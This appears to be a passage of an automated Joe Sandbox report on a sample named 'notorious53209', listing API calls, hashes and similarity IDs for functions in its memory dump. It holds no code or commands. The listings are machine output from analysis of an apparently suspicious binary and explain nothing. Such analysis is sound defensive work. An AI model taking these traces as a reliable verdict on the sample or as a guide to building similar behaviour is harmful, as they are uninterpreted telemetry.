                                                  • Instruction ID: 905f78107de634287fa5c5eae3bab8bba848eeb4814ea5d38e4d80d03268e2ff
                                                  • Opcode Fuzzy Hash: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                                                  • Instruction Fuzzy Hash: 4E31E4B191421EBEDB20CF748C94FB67BA8FB03304F144366E461D22A1F77598A5E791
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 008D8F12
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 008D8FBC
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008D8FC4
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 008D8FD2
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008D8FDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                                                  • Instruction ID: ecb873577da332d9bff5531a0b677e8e231a84c64801938d2bd23431b7610f97
                                                  • Opcode Fuzzy Hash: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                                                  • Instruction Fuzzy Hash: A431CE71504219EFDB14CF68DD4CAAE7BB6FB04315F10422AF925EA2D0CBB09A54DB91
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 008DB6C7
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008DB6E4
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008DB71C
                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 008DB742
                                                  • _wcsstr.LIBCMT ref: 008DB74C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: 70910bcae6bef3c8b8f90507723a334cad41879ec990eb656d791807f4189acf
                                                  • Instruction ID: 9fe8474bc5a5f9912149489fafd98e8042c9d8703ee286a5da8833311dae1795
                                                  • Opcode Fuzzy Hash: 70910bcae6bef3c8b8f90507723a334cad41879ec990eb656d791807f4189acf
                                                  • Instruction Fuzzy Hash: 5B21F932204248FFEB255B799C49E7B7B98FF4A760F01413AFC05CA2A1EF61DC419661
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090B44C
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0090B471
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0090B489
                                                  • GetSystemMetrics.USER32(00000004), ref: 0090B4B2
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0090B4D0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: 86ec7f6ce3a4cb5e1f643ca6cf9a1d50819cd03dd39f90128b7ca94d7da84d0f
                                                  • Instruction ID: 2b16aaceec89b4fe5c4efa86ac1a205168fadc5d243e94c7569bd85d7358c61c
                                                  • Opcode Fuzzy Hash: 86ec7f6ce3a4cb5e1f643ca6cf9a1d50819cd03dd39f90128b7ca94d7da84d0f
                                                  • Instruction Fuzzy Hash: 98219571524255AFCB209F39CC54A6A37A8FB05720F154B38FD26D76F1E7309A50EB90
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D9802
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9834
                                                  • __itow.LIBCMT ref: 008D984C
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9874
                                                  • __itow.LIBCMT ref: 008D9885
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                                                  • Instruction ID: bc12aada8573d5c72aacd67df957bd366627da1998eb1c4fbef0cfba1c10dfa7
                                                  • Opcode Fuzzy Hash: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                                                  • Instruction Fuzzy Hash: B221DA31B00208AFDB20AA658C86EEE7BB9FF4AB14F140136FD45DB351D671DD41A792
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0088134D
                                                  • SelectObject.GDI32(?,00000000), ref: 0088135C
                                                  • BeginPath.GDI32(?), ref: 00881373
                                                  • SelectObject.GDI32(?,00000000), ref: 0088139C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 9062601c9b41f77976e81a73fffb5ebe9da5a42be2d1c569dab1449b006a1653
                                                  • Instruction ID: 61d21b3c8534c431f812fe0fc12d50a92f657f2833ef26fe49b945afe10f5b68
                                                  • Opcode Fuzzy Hash: 9062601c9b41f77976e81a73fffb5ebe9da5a42be2d1c569dab1449b006a1653
                                                  • Instruction Fuzzy Hash: 3C2162B4828308DFDF219F25DC08B697BB8FB12322F144225F414D67A0DB759992EB91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                                                  • Instruction ID: fdd9ef3d68a64f66f80602a58f45960c5b2348a7c1937313c7eb8d534cce9ab4
                                                  • Opcode Fuzzy Hash: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                                                  • Instruction Fuzzy Hash: 6001967170422B7BEA04B6255C46EAB775CFF623A8F044212FE04D6383E6609E11C2E1
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 008E4D5C
                                                  • __beginthreadex.LIBCMT ref: 008E4D7A
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 008E4D8F
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 008E4DA5
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E4DAC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                                                  • Instruction ID: c288b7a8e06307dccab53b3bb471b80204bc55dd3208929d216f60be6f2eef89
                                                  • Opcode Fuzzy Hash: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                                                  • Instruction Fuzzy Hash: 731148B6A18248BFC7108FA89C04E9A7FACFB87320F144265F928D3250C6B18D0497A1
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                                  • GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                                  • RtlAllocateHeap.NTDLL(00000000,?,008D822A), ref: 008D8786
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 883493501-0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5502
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5510
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5518
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5522
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  APIs
                                                  • CLSIDFromProgID.OLE32 ref: 008D766F
                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 008D768A
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D7698
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008D76A8
                                                  • CLSIDFromString.OLE32(?,?), ref: 008D76B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D8628
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 47921759-0
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8689
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 47921759-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 008DC6BA
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 008DC6D1
                                                  • MessageBeep.USER32(00000000), ref: 008DC6E9
                                                  • KillTimer.USER32(?,0000040A), ref: 008DC705
                                                  • EndDialog.USER32(?,00000001), ref: 008DC71F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D8E7F
                                                  • CloseHandle.KERNEL32(?), ref: 008D8E94
                                                  • CloseHandle.KERNEL32(?), ref: 008D8E9C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 008D8EA5
                                                  • HeapFree.KERNEL32(00000000), ref: 008D8EAC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                  • String ID:
                                                  • API String ID: 3751786701-0
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 008EC69D
                                                  • CoCreateInstance.OLE32(00912D6C,00000000,00000001,00912BDC,?), ref: 008EC6B5
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • CoUninitialize.OLE32 ref: 008EC922
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  APIs
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 00887BB1: _memmove.LIBCMT ref: 00887C0B
                                                  • __swprintf.LIBCMT ref: 0089302D
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00892EC6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
